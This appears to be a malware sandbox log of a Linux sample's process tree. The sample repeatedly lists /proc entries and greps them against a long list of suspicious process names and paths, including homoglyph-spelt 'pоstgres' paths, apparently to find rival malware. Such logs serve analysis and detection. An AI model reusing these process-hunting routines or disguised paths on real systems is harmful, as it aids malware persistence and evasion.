/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1038
-
-
/bin/grepgrep exe2⤵PID:1042
-
-
/bin/lsls -latrh /proc/7012⤵PID:1041
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1045
-
-
/bin/grepgrep exe2⤵PID:1049
-
-
/bin/lsls -latrh /proc/7022⤵PID:1048
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1052
-
-
/bin/grepgrep exe2⤵PID:1055
-
-
/bin/lsls -latrh /proc/7062⤵PID:1054
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1058
-
-
/bin/lsls -latrh /proc/7072⤵PID:1062
-
-
/bin/grepgrep exe2⤵PID:1063
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1065
-
-
/bin/grepgrep exe2⤵PID:1069
-
-
/bin/lsls -latrh /proc/712⤵PID:1068
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1071
-
-
/bin/grepgrep exe2⤵PID:1074
-
-
/bin/lsls -latrh /proc/7152⤵PID:1073
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1076
-
-
/bin/grepgrep exe2⤵PID:1080
-
-
/bin/lsls -latrh /proc/722⤵PID:1079
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1082
-
-
/bin/lsls -latrh /proc/7242⤵PID:1084
-
-
/bin/grepgrep exe2⤵PID:1085
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1087
-
-
/bin/grepgrep exe2⤵PID:1090
-
-
/bin/lsls -latrh /proc/732⤵PID:1089
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1092
-
-
/bin/grepgrep exe2⤵PID:1095
-
-
/bin/lsls -latrh /proc/762⤵PID:1094
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1097
-
-
/bin/grepgrep exe2⤵PID:1100
-
-
/bin/lsls -latrh /proc/772⤵PID:1099
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1102
-
-
/bin/lsls -latrh /proc/792⤵PID:1104
-
-
/bin/grepgrep exe2⤵PID:1105
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1107
-
-
/bin/grepgrep exe2⤵PID:1110
-
-
/bin/lsls -latrh /proc/82⤵PID:1109
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1112
-
-
/bin/grepgrep exe2⤵PID:1115
-
-
/bin/lsls -latrh /proc/802⤵PID:1114
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1117
-
-
/bin/grepgrep exe2⤵PID:1120
-
-
/bin/lsls -latrh /proc/822⤵PID:1119
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1122
-
-
/bin/lsls -latrh /proc/92⤵PID:1124
-
-
/bin/grepgrep exe2⤵PID:1125
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1127
-
-
/bin/grepgrep exe2⤵PID:1130
-
-
/bin/lsls -latrh /proc/buddyinfo2⤵PID:1129
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1132
-
-
/bin/lsls -latrh /proc/bus2⤵PID:1134
-
-
/bin/grepgrep exe2⤵PID:1135
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1137
-
-
/bin/grepgrep exe2⤵PID:1140
-
-
/bin/lsls -latrh /proc/cgroups2⤵PID:1139
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1142
-
-
/bin/lsls -latrh /proc/cmdline2⤵PID:1144
-
-
/bin/grepgrep exe2⤵PID:1145
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1147
-
-
/bin/grepgrep exe2⤵PID:1153
-
-
/bin/lsls -latrh /proc/consoles2⤵PID:1152
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1155
-
-
/bin/grepgrep exe2⤵PID:1158
-
-
/bin/lsls -latrh /proc/cpuinfo2⤵PID:1157
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1160
-
-
/bin/grepgrep exe2⤵PID:1163
-
-
/bin/lsls -latrh /proc/crypto2⤵PID:1162
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1165
-
-
/bin/grepgrep exe2⤵PID:1168
-
-
/bin/lsls -latrh /proc/devices2⤵PID:1167
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1170
-
-
/bin/grepgrep exe2⤵PID:1173
-
-
/bin/lsls -latrh /proc/device-tree2⤵PID:1172
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1175
-
-
/bin/grepgrep exe2⤵PID:1178
-
-
/bin/lsls -latrh /proc/diskstats2⤵PID:1177
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1180
-
-
/bin/grepgrep exe2⤵PID:1183
-
-
/bin/lsls -latrh /proc/dma2⤵PID:1182
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1185
-
-
/bin/grepgrep exe2⤵PID:1188
-
-
/bin/lsls -latrh /proc/driver2⤵PID:1187
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1190
-
-
/bin/grepgrep exe2⤵PID:1193
-
-
/bin/lsls -latrh /proc/execdomains2⤵PID:1192
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1195
-
-
/bin/grepgrep exe2⤵PID:1198
-
-
/bin/lsls -latrh /proc/fb2⤵PID:1197
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1200
-
-
/bin/lsls -latrh /proc/filesystems2⤵PID:1202
-
-
/bin/grepgrep exe2⤵PID:1203
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1205
-
-
/bin/grepgrep exe2⤵PID:1208
-
-
/bin/lsls -latrh /proc/fs2⤵PID:1207
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1210
-
-
/bin/grepgrep exe2⤵PID:1213
-
-
/bin/lsls -latrh /proc/interrupts2⤵PID:1212
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1215
-
-
/bin/lsls -latrh /proc/iomem2⤵PID:1217
-
-
/bin/grepgrep exe2⤵PID:1218
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1221
-
-
/bin/lsls -latrh /proc/ioports2⤵PID:1224
-
-
/bin/grepgrep exe2⤵PID:1225
-
-
